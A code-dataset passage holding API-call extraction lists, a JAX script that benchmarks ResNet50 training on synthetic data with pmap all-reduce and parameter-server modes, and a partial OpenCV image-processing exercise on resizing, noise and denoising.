True, 'import numpy as np\n'), ((9471, 9482), 'numpy.max', 'np.max', (['fxy'], {}), '(fxy)\n', (9477, 9482), True, 'import numpy as np\n'), ((9505, 9516), 'numpy.min', 'np.min', (['fxy'], {}), '(fxy)\n', (9511, 9516), True, 'import numpy as np\n'), ((10217, 10227), 'numpy.max', 'np.max', (['fx'], {}), '(fx)\n', (10223, 10227), True, 'import numpy as np\n'), ((10250, 10260), 'numpy.min', 'np.min', (['fx'], {}), '(fx)\n', (10256, 10260), True, 'import numpy as np\n'), ((4961, 4983), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (4972, 4983), True, 'import scipy.integrate as spint\n'), ((5693, 5724), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (5702, 5724), True, 'import numpy as np\n'), ((5753, 5784), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (5762, 5784), True, 'import numpy as np\n'), ((5836, 5855), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl'], {}), '(xl, yl)\n', (5847, 5855), True, 'import numpy as np\n'), ((6183, 6205), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (6194, 6205), True, 'import scipy.integrate as spint\n'), ((6869, 6900), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (6878, 6900), True, 'import numpy as np\n'), ((7087, 7109), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (7098, 7109), True, 'import scipy.integrate as spint\n'), ((7752, 7769), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (7766, 7769), True, 'import numpy as np\n'), ((7811, 7828), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (7825, 7828), True, 'import numpy as np\n'), ((7870, 7887), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (7884, 7887), True, 'import numpy as np\n'), ((8390, 8413), 'numpy.random.rand', 'np.random.rand', (['N', 'N', 'N'], {}), '(N, N, N)\n', (8404, 8413), True, 'import numpy as np\n'), ((10937, 10968), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (10946, 10968), True, 'import numpy as np\n'), ((10989, 11020), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (10998, 11020), True, 'import numpy as np\n'), ((11041, 11072), 'numpy.arange', 'np.arange', (['limz[0]', 'limz[1]', 'dz'], {}), '(limz[0], limz[1], dz)\n', (11050, 11072), True, 'import numpy as np\n'), ((11099, 11122), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl', 'zl'], {}), '(xl, yl, zl)\n', (11110, 11122), True, 'import numpy as np\n'), ((11554, 11576), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (11565, 11576), True, 'import scipy.integrate as spint\n'), ((4906, 4928), 'scipy.integrate.simps', 'spint.simps', (['fz'], {'dx': 'dz'}), '(fz, dx=dz)\n', (4917, 4928), True, 'import scipy.integrate as spint\n'), ((5081, 5102), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (5087, 5102), True, 'import numpy as np\n'), ((9052, 9069), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (9066, 9069), True, 'import numpy as np\n'), ((9115, 9132), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (9129, 9132), True, 'import numpy as np\n'), ((9537, 9557), 'numpy.random.rand', 'np.random.rand', (['N', 'N'], {}), '(N, N)\n', (9551, 9557), True, 'import numpy as np\n'), ((10043, 10060), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (10057, 10060), True, 'import numpy as np\n'), ((10281, 10298), 'numpy.random.rand', 'np.random.rand', (['N'], {}), '(N)\n', (10295, 10298), True, 'import numpy as np\n'), ((6130, 6152), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (6141, 6152), True, 'import scipy.integrate as spint\n'), ((11509, 11531), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (11520, 11531), True, 'import scipy.integrate as spint\n'), ((12241, 12272), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (12250, 12272), True, 'import numpy as np\n'), ((12301, 12332), 'numpy.arange', 'np.arange', (['limy[0]', 'limy[1]', 'dy'], {}), '(limy[0], limy[1], dy)\n', (12310, 12332), True, 'import numpy as np\n'), ((12384, 12403), 'numpy.meshgrid', 'np.meshgrid', (['xl', 'yl'], {}), '(xl, yl)\n', (12395, 12403), True, 'import numpy as np\n'), ((12731, 12753), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (12742, 12753), True, 'import scipy.integrate as spint\n'), ((13417, 13448), 'numpy.arange', 'np.arange', (['limx[0]', 'limx[1]', 'dx'], {}), '(limx[0], limx[1], dx)\n', (13426, 13448), True, 'import numpy as np\n'), ((13635, 13657), 'scipy.integrate.simps', 'spint.simps', (['fx'], {'dx': 'dx'}), '(fx, dx=dx)\n', (13646, 13657), True, 'import scipy.integrate as spint\n'), ((6274, 6295), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (6280, 6295), True, 'import numpy as np\n'), ((7178, 7199), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (7184, 7199), True, 'import numpy as np\n'), ((11454, 11476), 'scipy.integrate.simps', 'spint.simps', (['fz'], {'dx': 'dz'}), '(fz, dx=dz)\n', (11465, 11476), True, 'import scipy.integrate as spint\n'), ((11629, 11650), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (11635, 11650), True, 'import numpy as np\n'), ((12678, 12700), 'scipy.integrate.simps', 'spint.simps', (['fy'], {'dx': 'dy'}), '(fy, dx=dy)\n', (12689, 12700), True, 'import scipy.integrate as spint\n'), ((12822, 12843), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (12828, 12843), True, 'import numpy as np\n'), ((13726, 13747), 'numpy.abs', 'np.abs', (['(res - lastres)'], {}), '(res - lastres)\n', (13732, 13747), True, 'import numpy as np\n')]
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An MNIST example with single-program multiple-data (SPMD) data parallelism.
The aim here is to illustrate how to use JAX's `pmap` to express and execute
SPMD programs for data parallelism along a batch dimension, while also
minimizing dependencies by avoiding the use of higher-level layers and
optimizers libraries.
"""
from functools import partial
import time
import numpy as np
import numpy.random as npr
from jax import jit, grad, pmap
from jax.scipy.special import logsumexp
from jax.lib import xla_bridge
from jax.tree_util import tree_map,tree_flatten,tree_unflatten
from jax import lax
import jax.numpy as jnp
import numpy.random as npr
import jax
import jax.numpy as jnp
from jax import jit, grad, random
from jax.experimental import optimizers
from jax.experimental import stax
from jax.experimental.stax import (AvgPool, BatchNorm, Conv, Dense, FanInSum,
FanOut, Flatten, GeneralConv, Identity,
MaxPool, Relu, LogSoftmax)
import ctypes
_cudart = ctypes.CDLL('libcudart.so')
def cu_prof_start():
ret = _cudart.cudaProfilerStart()
if ret != 0:
raise Exception('cudaProfilerStart() returned %d' % ret)
def cu_prof_stop():
ret = _cudart.cudaProfilerStop()
if ret != 0:
raise Exception('cudaProfilerStop() returned %d' % ret)
def ConvBlock(kernel_size, filters, strides=(2, 2)):
ks = kernel_size
filters1, filters2, filters3 = filters
Main = stax.serial(
Conv(filters1, (1, 1), strides), BatchNorm(), Relu,
Conv(filters2, (ks, ks), padding='SAME'), BatchNorm(), Relu,
Conv(filters3, (1, 1)), BatchNorm())
Shortcut = stax.serial(Conv(filters3, (1, 1), strides), BatchNorm())
return stax.serial(FanOut(2), stax.parallel(Main, Shortcut), FanInSum, Relu)
def IdentityBlock(kernel_size, filters):
ks = kernel_size
filters1, filters2 = filters
def make_main(input_shape):
# the number of output channels depends on the number of input channels
return stax.serial(
Conv(filters1, (1, 1)), BatchNorm(), Relu,
Conv(filters2, (ks, ks), padding='SAME'), BatchNorm(), Relu,
Conv(input_shape[3], (1, 1)), BatchNorm())
Main = stax.shape_dependent(make_main)
return stax.serial(FanOut(2), stax.parallel(Main, Identity), FanInSum, Relu)
# ResNet architectures compose layers and ResNet blocks
def ResNet50(num_classes):
return stax.serial(
GeneralConv(('HWCN', 'OIHW', 'NHWC'), 64, (7, 7), (2, 2), 'SAME'),
BatchNorm(), Relu, MaxPool((3, 3), strides=(2, 2)),
ConvBlock(3, [64, 64, 256], strides=(1, 1)),
IdentityBlock(3, [64, 64]),
IdentityBlock(3, [64, 64]),
ConvBlock(3, [128, 128, 512]),
IdentityBlock(3, [128, 128]),
IdentityBlock(3, [128, 128]),
IdentityBlock(3, [128, 128]),
ConvBlock(3, [256, 256, 1024]),
IdentityBlock(3, [256, 256]),
IdentityBlock(3, [256, 256]),
IdentityBlock(3, [256, 256]),
IdentityBlock(3, [256, 256]),
IdentityBlock(3, [256, 256]),
ConvBlock(3, [512, 512, 2048]),
IdentityBlock(3, [512, 512]),
IdentityBlock(3, [512, 512]),
AvgPool((7, 7)), Flatten, Dense(num_classes), LogSoftmax)
if __name__ == "__main__":
rng_key = random.PRNGKey(0)
batch_size = 64
num_classes = 1001
input_shape = (224, 224, 3, batch_size)
step_size = 0.1
num_steps = 10
init_fun, predict_fun = ResNet50(num_classes)
_, init_params = init_fun(rng_key, input_shape)
num_devices = xla_bridge.device_count()
def loss(params, batch):
inputs, targets = batch
logits = predict_fun(params, inputs)
return -jnp.sum(logits * targets)
def accuracy(params, batch):
inputs, targets = batch
target_class = jnp.argmax(targets, axis=-1)
predicted_class = jnp.argmax(predict_fun(params, inputs), axis=-1)
return jnp.mean(predicted_class == target_class)
def synth_batches():
rng = npr.RandomState(0)
while True:
images = rng.rand(*input_shape).astype('float32')
labels = rng.randint(num_classes, size=(batch_size, 1))
onehot_labels = labels == jnp.arange(num_classes)
batch_size_per_device, ragged = divmod(images.shape[-1], num_devices)
if ragged:
msg = "batch size must be divisible by device count, got {} and {}."
raise ValueError(msg.format(batch_size, num_devices))
shape_prefix = (num_devices, )
shape_postfix = (batch_size_per_device,)
images = images.reshape(shape_prefix + images.shape[:-1]+shape_postfix)
labels = labels.reshape(shape_prefix + shape_postfix+labels.shape[-1:])
yield images, labels
def ps_synth_batches():
rng = npr.RandomState(0)
while True:
images = rng.rand(*input_shape).astype('float32')
labels = rng.randint(num_classes, size=(batch_size, 1))
onehot_labels = labels == jnp.arange(num_classes)
yield images, onehot_labels
opt_init, opt_update, get_params = optimizers.momentum(step_size, mass=0.9)
batches = synth_batches()
ps_batches = ps_synth_batches()
@jit
def update(i, opt_state, batch):
params = get_params(opt_state)
return opt_update(i, grad(loss)(params, batch), opt_state)
@partial(pmap, axis_name='batch')
def allreduce_spmd_update( i,op_state, batch):
#params = tree_unflatten(treedef, params)
params = get_params(op_state)
grads = grad(loss)(params, batch)
leaves, local_treedef = tree_flatten(grads)
# We compute the total gradients, summing across the device-mapped axis,
# using the `lax.psum` SPMD primitive, which does a fast all-reduce-sum.
grads = [lax.psum(dw, 'batch') for dw in leaves]
grads = tree_unflatten(local_treedef, grads)
op_state = opt_update(i, grads, op_state)
return op_state
@partial(pmap, axis_name='batch')
def ps_spmd_update( params, batch):
grads = grad(loss)(params, batch)
return grads
@partial(jit, device=jax.devices()[0])
def ps_pre_process(op_state):
params = get_params(op_state)
replicated_op_params = tree_map(replicate_array, params)
return replicated_op_params
@partial(jit, device=jax.devices()[0])
def ps_post_process(grads,op_state,i):
grads = tree_map(lambda x: jnp.sum(x,axis=0), grads)
op_state = opt_update(i, grads, op_state)
return op_state
@jit
def ps_loop_process(op_state,k,batch_list):
grads = []
op_state = jax.device_put(op_state, jax.devices()[0])
for i in range(num_devices):
params = jax.device_put(get_params(op_state), jax.devices()[i])
_grad = jax.device_put(grad(loss)(params, batch_list[i]), jax.devices()[i])
_grad = jax.device_put(_grad, jax.devices()[0])
k = jax.device_put(k, jax.devices()[0])
op_state = opt_update(k, _grad, op_state)
return op_state
replicate_array = lambda x: jnp.broadcast_to(x, (num_devices,) + x.shape)
allreduce = True
if allreduce:
op_state = opt_init(init_params)
replicated_op_state = tree_map(replicate_array, op_state)
for i in range(num_steps):
#params, treedef = tree_flatten(params)
if i==3:
cu_prof_start()
new_batch = next(batches)
start_time = time.time()
replicated_op_state = allreduce_spmd_update( jnp.array([i]*num_devices),replicated_op_state, new_batch)
if i == 3:
cu_prof_stop()
end_time = time.time() - start_time
print("time:",end_time)
else:
op_state = jax.device_put(opt_init(init_params), jax.devices()[0])
'''
for i in range (num_steps):
new_batch = next(batches)
start_time = time.time()
replicated_op_params = ps_pre_process(op_state)
grads = ps_spmd_update(replicated_op_params,new_batch)
op_state = ps_post_process(grads,op_state,i)
end_time = time.time() - start_time
print("time:",end_time)
'''
for i in range (num_steps):
if i==3:
cu_prof_start()
batches_list = []
for i in range(num_devices):
batches_list.append(jax.device_put(next(ps_batches),jax.devices()[i]))
start_time = time.time()
op_state = ps_loop_process(op_state,i,batches_list)
end_time = time.time() - start_time
print("time:",end_time)
if i==3:
cu_prof_stop()
|
[
"jax.experimental.stax.BatchNorm",
"jax.experimental.stax.GeneralConv",
"jax.random.PRNGKey",
"jax.lax.psum",
"jax.tree_util.tree_unflatten",
"jax.tree_util.tree_map",
"jax.experimental.stax.parallel",
"jax.numpy.argmax",
"jax.experimental.stax.FanOut",
"numpy.random.RandomState",
"jax.experimental.optimizers.momentum",
"jax.experimental.stax.Dense",
"jax.experimental.stax.AvgPool",
"jax.experimental.stax.Conv",
"jax.experimental.stax.MaxPool",
"jax.tree_util.tree_flatten",
"jax.numpy.broadcast_to",
"jax.experimental.stax.shape_dependent",
"functools.partial",
"jax.numpy.sum",
"ctypes.CDLL",
"jax.numpy.array",
"jax.numpy.arange",
"time.time",
"jax.lib.xla_bridge.device_count",
"jax.grad",
"jax.numpy.mean",
"jax.devices"
] |
[((1615, 1642), 'ctypes.CDLL', 'ctypes.CDLL', (['"""libcudart.so"""'], {}), "('libcudart.so')\n", (1626, 1642), False, 'import ctypes\n'), ((2767, 2798), 'jax.experimental.stax.shape_dependent', 'stax.shape_dependent', (['make_main'], {}), '(make_main)\n', (2787, 2798), False, 'from jax.experimental import stax\n'), ((3813, 3830), 'jax.random.PRNGKey', 'random.PRNGKey', (['(0)'], {}), '(0)\n', (3827, 3830), False, 'from jax import jit, grad, random\n'), ((4064, 4089), 'jax.lib.xla_bridge.device_count', 'xla_bridge.device_count', ([], {}), '()\n', (4087, 4089), False, 'from jax.lib import xla_bridge\n'), ((5530, 5570), 'jax.experimental.optimizers.momentum', 'optimizers.momentum', (['step_size'], {'mass': '(0.9)'}), '(step_size, mass=0.9)\n', (5549, 5570), False, 'from jax.experimental import optimizers\n'), ((5778, 5810), 'functools.partial', 'partial', (['pmap'], {'axis_name': '"""batch"""'}), "(pmap, axis_name='batch')\n", (5785, 5810), False, 'from functools import partial\n'), ((6354, 6386), 'functools.partial', 'partial', (['pmap'], {'axis_name': '"""batch"""'}), "(pmap, axis_name='batch')\n", (6361, 6386), False, 'from functools import partial\n'), ((2052, 2083), 'jax.experimental.stax.Conv', 'Conv', (['filters1', '(1, 1)', 'strides'], {}), '(filters1, (1, 1), strides)\n', (2056, 2083), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2085, 2096), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2094, 2096), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2110, 2150), 'jax.experimental.stax.Conv', 'Conv', (['filters2', '(ks, ks)'], {'padding': '"""SAME"""'}), "(filters2, (ks, ks), padding='SAME')\n", (2114, 2150), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2152, 2163), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2161, 2163), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2177, 2199), 'jax.experimental.stax.Conv', 'Conv', (['filters3', '(1, 1)'], {}), '(filters3, (1, 1))\n', (2181, 2199), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2201, 2212), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2210, 2212), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2239, 2270), 'jax.experimental.stax.Conv', 'Conv', (['filters3', '(1, 1)', 'strides'], {}), '(filters3, (1, 1), strides)\n', (2243, 2270), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2272, 2283), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2281, 2283), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2306, 2315), 'jax.experimental.stax.FanOut', 'FanOut', (['(2)'], {}), '(2)\n', (2312, 2315), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2317, 2346), 'jax.experimental.stax.parallel', 'stax.parallel', (['Main', 'Shortcut'], {}), '(Main, Shortcut)\n', (2330, 2346), False, 'from jax.experimental import stax\n'), ((2820, 2829), 'jax.experimental.stax.FanOut', 'FanOut', (['(2)'], {}), '(2)\n', (2826, 2829), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2831, 2860), 'jax.experimental.stax.parallel', 'stax.parallel', (['Main', 'Identity'], {}), '(Main, Identity)\n', (2844, 2860), False, 'from jax.experimental import stax\n'), ((2992, 3057), 'jax.experimental.stax.GeneralConv', 'GeneralConv', (["('HWCN', 'OIHW', 'NHWC')", '(64)', '(7, 7)', '(2, 2)', '"""SAME"""'], {}), "(('HWCN', 'OIHW', 'NHWC'), 64, (7, 7), (2, 2), 'SAME')\n", (3003, 3057), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3065, 3076), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (3074, 3076), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3084, 3115), 'jax.experimental.stax.MaxPool', 'MaxPool', (['(3, 3)'], {'strides': '(2, 2)'}), '((3, 3), strides=(2, 2))\n', (3091, 3115), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3715, 3730), 'jax.experimental.stax.AvgPool', 'AvgPool', (['(7, 7)'], {}), '((7, 7))\n', (3722, 3730), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((3741, 3759), 'jax.experimental.stax.Dense', 'Dense', (['num_classes'], {}), '(num_classes)\n', (3746, 3759), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((4305, 4333), 'jax.numpy.argmax', 'jnp.argmax', (['targets'], {'axis': '(-1)'}), '(targets, axis=-1)\n', (4315, 4333), True, 'import jax.numpy as jnp\n'), ((4416, 4457), 'jax.numpy.mean', 'jnp.mean', (['(predicted_class == target_class)'], {}), '(predicted_class == target_class)\n', (4424, 4457), True, 'import jax.numpy as jnp\n'), ((4492, 4510), 'numpy.random.RandomState', 'npr.RandomState', (['(0)'], {}), '(0)\n', (4507, 4510), True, 'import numpy.random as npr\n'), ((5249, 5267), 'numpy.random.RandomState', 'npr.RandomState', (['(0)'], {}), '(0)\n', (5264, 5267), True, 'import numpy.random as npr\n'), ((6007, 6026), 'jax.tree_util.tree_flatten', 'tree_flatten', (['grads'], {}), '(grads)\n', (6019, 6026), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((6246, 6282), 'jax.tree_util.tree_unflatten', 'tree_unflatten', (['local_treedef', 'grads'], {}), '(local_treedef, grads)\n', (6260, 6282), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((6616, 6649), 'jax.tree_util.tree_map', 'tree_map', (['replicate_array', 'params'], {}), '(replicate_array, params)\n', (6624, 6649), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((7396, 7441), 'jax.numpy.broadcast_to', 'jnp.broadcast_to', (['x', '((num_devices,) + x.shape)'], {}), '(x, (num_devices,) + x.shape)\n', (7412, 7441), True, 'import jax.numpy as jnp\n'), ((7541, 7576), 'jax.tree_util.tree_map', 'tree_map', (['replicate_array', 'op_state'], {}), '(replicate_array, op_state)\n', (7549, 7576), False, 'from jax.tree_util import tree_map, tree_flatten, tree_unflatten\n'), ((2595, 2617), 'jax.experimental.stax.Conv', 'Conv', (['filters1', '(1, 1)'], {}), '(filters1, (1, 1))\n', (2599, 2617), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2619, 2630), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2628, 2630), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2646, 2686), 'jax.experimental.stax.Conv', 'Conv', (['filters2', '(ks, ks)'], {'padding': '"""SAME"""'}), "(filters2, (ks, ks), padding='SAME')\n", (2650, 2686), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2688, 2699), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2697, 2699), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2715, 2743), 'jax.experimental.stax.Conv', 'Conv', (['input_shape[3]', '(1, 1)'], {}), '(input_shape[3], (1, 1))\n', (2719, 2743), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((2745, 2756), 'jax.experimental.stax.BatchNorm', 'BatchNorm', ([], {}), '()\n', (2754, 2756), False, 'from jax.experimental.stax import AvgPool, BatchNorm, Conv, Dense, FanInSum, FanOut, Flatten, GeneralConv, Identity, MaxPool, Relu, LogSoftmax\n'), ((4200, 4225), 'jax.numpy.sum', 'jnp.sum', (['(logits * targets)'], {}), '(logits * targets)\n', (4207, 4225), True, 'import jax.numpy as jnp\n'), ((5953, 5963), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (5957, 5963), False, 'from jax import jit, grad, random\n'), ((6194, 6215), 'jax.lax.psum', 'lax.psum', (['dw', '"""batch"""'], {}), "(dw, 'batch')\n", (6202, 6215), False, 'from jax import lax\n'), ((6437, 6447), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (6441, 6447), False, 'from jax import jit, grad, random\n'), ((7744, 7755), 'time.time', 'time.time', ([], {}), '()\n', (7753, 7755), False, 'import time\n'), ((8634, 8645), 'time.time', 'time.time', ([], {}), '()\n', (8643, 8645), False, 'import time\n'), ((4677, 4700), 'jax.numpy.arange', 'jnp.arange', (['num_classes'], {}), '(num_classes)\n', (4687, 4700), True, 'import jax.numpy as jnp\n'), ((5434, 5457), 'jax.numpy.arange', 'jnp.arange', (['num_classes'], {}), '(num_classes)\n', (5444, 5457), True, 'import jax.numpy as jnp\n'), ((5736, 5746), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (5740, 5746), False, 'from jax import jit, grad, random\n'), ((6505, 6518), 'jax.devices', 'jax.devices', ([], {}), '()\n', (6516, 6518), False, 'import jax\n'), ((6796, 6814), 'jax.numpy.sum', 'jnp.sum', (['x'], {'axis': '(0)'}), '(x, axis=0)\n', (6803, 6814), True, 'import jax.numpy as jnp\n'), ((6706, 6719), 'jax.devices', 'jax.devices', ([], {}), '()\n', (6717, 6719), False, 'import jax\n'), ((6997, 7010), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7008, 7010), False, 'import jax\n'), ((7234, 7247), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7245, 7247), False, 'import jax\n'), ((7278, 7291), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7289, 7291), False, 'import jax\n'), ((7807, 7835), 'jax.numpy.array', 'jnp.array', (['([i] * num_devices)'], {}), '([i] * num_devices)\n', (7816, 7835), True, 'import jax.numpy as jnp\n'), ((7923, 7934), 'time.time', 'time.time', ([], {}), '()\n', (7932, 7934), False, 'import time\n'), ((8039, 8052), 'jax.devices', 'jax.devices', ([], {}), '()\n', (8050, 8052), False, 'import jax\n'), ((8721, 8732), 'time.time', 'time.time', ([], {}), '()\n', (8730, 8732), False, 'import time\n'), ((7100, 7113), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7111, 7113), False, 'import jax\n'), ((7147, 7157), 'jax.grad', 'grad', (['loss'], {}), '(loss)\n', (7151, 7157), False, 'from jax import jit, grad, random\n'), ((7182, 7195), 'jax.devices', 'jax.devices', ([], {}), '()\n', (7193, 7195), False, 'import jax\n'), ((8596, 8609), 'jax.devices', 'jax.devices', ([], {}), '()\n', (8607, 8609), False, 'import jax\n')]
|
import os
from math import *
import numpy as np
from scipy import misc
from scipy.ndimage import gaussian_filter
import cv2
def reviseImage():
img_names = [
"1.jpeg", "2.jpeg", "3.jpeg", "dark.jpeg", "overexposure.jpeg"
]
for filename in img_names:
fn = "./img_data/cutted/" + filename
img = cv2.imread(fn, cv2.IMREAD_GRAYSCALE)
newimg = cv2.resize(img, (640, 480))
cv2.imwrite("./part1/revised_" + filename, newimg)
def geoTransform():
"""
(2) geometric transformations
"""
for fn in os.listdir("./part1"):
path = "./part1/%s" % fn
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
# [1] https://docs.opencv.org/3.4.2/da/d6e/tutorial_py_geometric_transformations.html
double = cv2.resize(img, (1280, 960), interpolation=cv2.INTER_LINEAR)
shrink = cv2.resize(img, (320, 240), interpolation=cv2.INTER_CUBIC)
stretch = cv2.resize(img, (1280, 720), interpolation=cv2.INTER_CUBIC)
cv2.imwrite("./part2/double_" + fn, double)
cv2.imwrite("./part2/shrink_" + fn, shrink)
cv2.imwrite("./part2/stretch_" + fn, stretch)
def addGaussianNoises():
"""
(3) add 3 different noises
"""
img_names = [
"1.jpeg", "2.jpeg", "3.jpeg", "dark.jpeg", "overexposure.jpeg"
]
for (m, v) in [(10, 100), (50, 30), (200, 200)]:
for filename in img_names:
s = sqrt(v)
fn = "./part1/revised_" + filename
img = cv2.imread(fn, cv2.IMREAD_UNCHANGED)
gaussian = np.random.normal(m, s, (480, 640))
noisy_image = np.zeros(img.shape, np.float32)
noisy_image = img + gaussian
cv2.normalize(
noisy_image, noisy_image, 0, 255, cv2.NORM_MINMAX, dtype=-1)
noisy_image = noisy_image.astype(np.uint8)
cv2.imwrite("./part3/%d_%d_" % (m, v) + filename, noisy_image)
def removeGaussianNoises():
"""
(4) remove noises from part 3
"""
for fn in os.listdir("./part3"):
path = "./part3/%s" % fn
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
newimg = cv2.fastNlMeansDenoising(img, None, 10, 7, 21)
cv2.imwrite("./part4/denoise_" + fn, newimg)
def luminanceAdjust():
"""
(5) luminance adjustment of overexposured and dark image in (1)
"""
filename = ["dark.jpeg", "overexposure.jpeg"]
for fn in filename:
path = "./part1/revised_" + fn
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
# 1. histogram equalize
newimg = cv2.equalizeHist(img)
cv2.imwrite("./part5/equHist_" + fn, newimg)
# 2. Gamma correction
